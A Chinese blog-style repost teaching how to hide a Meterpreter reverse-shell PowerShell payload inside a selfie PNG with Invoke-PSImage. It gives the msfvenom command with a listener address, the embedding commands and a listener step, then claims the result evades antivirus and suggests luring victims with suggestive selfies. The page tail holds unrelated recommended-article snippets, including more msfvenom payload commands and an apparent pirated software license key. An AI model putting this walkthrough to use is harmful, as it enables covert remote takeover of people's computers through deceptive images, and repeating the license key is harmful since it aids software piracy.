運行shell script 文件_利用自拍照反弹shell

最新推荐文章于 2023-08-14 15:23:09 发布
最新推荐文章于 2023-08-14 15:23:09 发布
阅读量137 收藏
点赞数
文章标签: 運行shell script 文件

3d7f61990e131264799de29d8a41fac8.gif

文章来源:洛米唯熊

0x00:前言

继前面讲到的用(看我如何利用微信反弹shell)之后,引来了很多人的围观。确实,新颖的利用方式。很有利用价值!闲话少说。今天,利用奇思妙想的方法来反弹shell。用一张自拍照。

0x01:过程

利用工具:

https://github.com/peewpw/Invoke-PSImage

一、首先利用msf创建一个ps1脚本

代码:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.124.11 LPORT=6666 -f psh-reflection  -o /root/luomiweixiong.ps1

a93b8c951e40e5e8b629dd4cefb50e14.png

利用msf生成ps1脚本

二、找一张自拍图

(我这里用我自己的头像)

7d253312a40bf7a8cf7c131e4114578b.png

luomiweixiong.png

放在Invoke-PSImage目录下,方便执行命令的时候找文件

三、两者合并

85895e4de2900d873be6cd0a98fcb42d.png

两者合并

解释:

首先要执行“Import-Module .\Invoke-PSImage.ps1”命令。再执行“Invoke-PSImage -Script .\luomiweixiong.ps1 -Image .\luomiweixiong.png -Out .\luomiwexiong2.png“命令进行两者合并。

第1个解释中的命令解释:导入模块。

第2个解释中的命令分解:luomiweixiong.ps1为msf生成的ps1文件。luomiweixiong.png为原来的头像文件。luomiwexiong2.png为生成后的头像文件。

    949a429b689177eef64c46f7619fce7f.png

生成后的文件会比原来的大。emmm  大重点是  还是显示原来的头像

四、监听

8e0e476d4e2461aecb0337d20d359cc0.png

老生常谈的方式,不会的请出门左转.

百度一下

五、见证奇迹

exploit开始攻击,运行生成后的

"luomiweixiong2.png"文件,查看效果

1eccad5c29404eb1d852f82179727314.png

   是的。没错。获取到会话了

六、查杀

1、本地查杀    2345安全卫士表示没问题

eff4b338d6c95d0408a325daf08223c6.png

2、在线查杀

bf36f86cec40bfcead680abe3f97049c.png

表示没有压力

0x02:后话

其实还可以更加隐蔽的合并两者,并有更好的效果。比如诱人的小姐姐私房自拍照。

1cfb9311adff913a4974d3c00fab20f9.png

cb70a2cd1603462f01d1d09b94b89df5.png

weixin_39750598
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Matrox MIL C++程序
02-23
Imaging library程序,实现Matrox卡视频采集,抓图等功能
如何利用matrox mil在picturebox中显示image_如何利用docker分分钟搞定你的数据库(1)...
weixin_39576127的博客
11-26 130
辛苦原创,引用请注明谢谢正文:为什么现在大家都在用docker现在越来越多的项目都在利用微服务(microservice), 容器化(containerize) 和云服务(AWS, Azure, Google Cloud). 将传统的项目容器化的优势在于,你的代码可以自由的部署在任何环境且不用担心系统的版本,相关配置,以及各种依赖的包。容器的种类有很多,大家最常用就数docker。 下面言归正传...
如何利用matrox mil在picturebox中显示image_利用Google earth engine合成无云影像
weixin_40009099的博客
11-23 235
Google Earth Engine(合成的影像)Landsat-8(30m分辨率)和哨兵-2(10m分辨率)都是我们常用的遥感影像数据。但是,遥感影像在很多情况下都会有云,我们就需要对影像进行去云处理,这样会使影像出现数据的缺失。我们可以利用Google earth engine对多景影像进行合成,得到无云的影像,而且也没有数据的缺失(类似于MODIS8天反射率产品)。还有一种情况就是,我们的...
如何利用matrox mil在picturebox中显示image_在实时音视频领域,如何基于 TensorFlow 实现图像识别!...
weixin_39607710的博客
11-27 188
近两年来,Python 在众多编程语言中的热度一直稳居前五,热门程度可见一斑。 Python 拥有很活跃的社区和丰富的第三方库,Web 框架、爬虫框架、数据分析框架、机器学习框架等,开发者无需重复造轮子,可以用 Python 进行 Web 编程、网络编程,开发多媒体应用,进行数据分析,或实现图像识别等应用。其中图像识别是最热门的应用场景之一,也是与实时音视频契合度最高的应用场景之一。本文将分享 T...
自学C# 7.C#中利用pictureBox控件直接显示
orange_dpp的博客
08-14 1557
C#中利用pictureBox控件直接显示
run_script:在Rust中运行Shell脚本
05-06
run_script 在运行shell脚本。 执照 概述 该库使您可以根据外壳脚本的内容来调用它们。 尽管std :: process :: Command非常适合执行独立命令,但您需要更多手动代码来获取脚本文本并执行它。 为此,创建了该库。...
java_unix_shell.rar_java 模拟 shell_文件管理 java
09-19
用java写的unix文件管理模拟系统,可供需做此实验的大学生朋友参考
shell_script_demo
02-20
编写的一些shell脚本 MySQL_setup.sh编译安装MySQL 5.7.29 MySQL_setup_v2.0.sh编译安装MySQL 5.7.29(优化版) Nginx_setup.sh编译安装Nginx 1.19.2 nginx_setup_v2.0s.sh编译安装Nginx 1.19.2(简化版) nginx...
Shell_Script_Project
04-04
Shell_Script_Project
cpu-monitor.rar_linux cpu_linux monitor scri_shell SCRIPT C_shel
09-23
系统监视脚本(LINUX),CPU利用率监视, shell script.
Mil9.0的下载.zip
07-09
本人亲测,百分百可用。 matrox mil9 crack.rar Mil9下载地址.doc matrox mil9 安装破解说明.pdf
matrox mil9 key
04-28
matrox mil9 key,L992-RATD-T3B3-7QJT-40MQ-GPDU-E1VN-7E3G-ST9D-9X5N-PGBJ-2B5N-4N2D-MW4E-MS0S-K167-C0GX-1111-1111
如何利用matrox mil在picturebox中显示image_WPS文字办公—文档中给数字打上马赛克...
weixin_39580682的博客
11-28 135
我们在利用WPS文档与Word文档进行日常办公时,经常需要在文档当中输入各种电话号码,但是如果想要成功隐藏号码中间的四位数该怎么办呢,我们在WPS表格当中都会隐藏,只需要在设置的单元格格式里设置就可以了,但在文档当中,可没有自定义单元格格式哦,那么在WPS文档与Word文档当中,如何给数字打上马赛克呢,今天我们就来教大家这个方法,具体怎么操作呢,一起来学习一下吧。文档中给数字打上马赛克首先,我们先...
目标检测中算法评价指标FPS和mAp的原理和代码实现
热门推荐
哆啦A梦爱学习的博客
10-13 3万+
点击上方“码农的后花园”,选择“星标”公众号精选文章,第一时间送达FPS和mAP是目标检测算法的两个重要评估指标,FPS是用来评估目标检测的速度,即每秒内可以处理的图片数量或者处理一...
msfvenom-shll生成工具是msf 组件——Metasploit(MSF)使用详解
代码审计
04-22 2212
抽离 专职生成对应的payload异或编码 -e x86/shikata_ga_nai -i 3linux 生成 payloadphp 生成 payloadpython 生成 payloadwindows 生产payload 抽离 专职生成对应的payload 异或 编码 免杀 msfvenom -l platforms 支持平台 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.226.142 lport=55212 -f
MSF使用1
xhscxj的博客
06-12 3308
进入kali中文件,将原有的源注释掉,换上清华的源 进行更新msf:辅助模块,辅助渗透(端口扫描、登录密码爆破、漏洞验证等) :漏洞利用模块,包含主流的漏洞利用脚本,通常是对某些可能存在漏洞的目标进行漏洞利用。命名规则:操作系统/各种应用协议分类 :攻击载荷,主要是攻击成功后在目标机器执行的代码,比如反弹shell的代码 :后渗透阶段模块,漏洞利用成功获得meterpreter之后,向目标发送的一些功能性指令,如:提权等 :编码器模块,主要包含各种编码工具,对payload进行编码加密,以便绕过入侵检测和过
内网渗透之Windows反弹shell(一)
不知名白帽的博客
07-08 1936
内网渗透之Windows反弹shell(一)(反向shell简介、Windows反弹shell
Matrox MIL9.0卸载和安装过程
zkw502434177的专栏
12-08 9861
Matrox MIL9.0图像处理软件的卸载和安装教程。
Matrox MIL图像采集卡使用QT获取图像
qq_31629063的博客
08-12 2920
//MilCC.h #pragma once #pragma execution_character_set("utf-8") #include <QThread.h> #include <Mil.h> #include <QDebug> #include <QImage> #include <QFileInfo> #include <QMutex> #include <cv.h> #include <cxcore.
反弹shell保存文件
最新发布
08-20
如果您想在目标系统上创建一个反弹shell并将其保存到文件中,可以按照以下步骤操作: 1. 创建一个反弹shell脚本文件,例如`reverse_shell.sh`,并在其中编写反弹shell的代码。例如,下面是一个简单的反弹bash shell...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值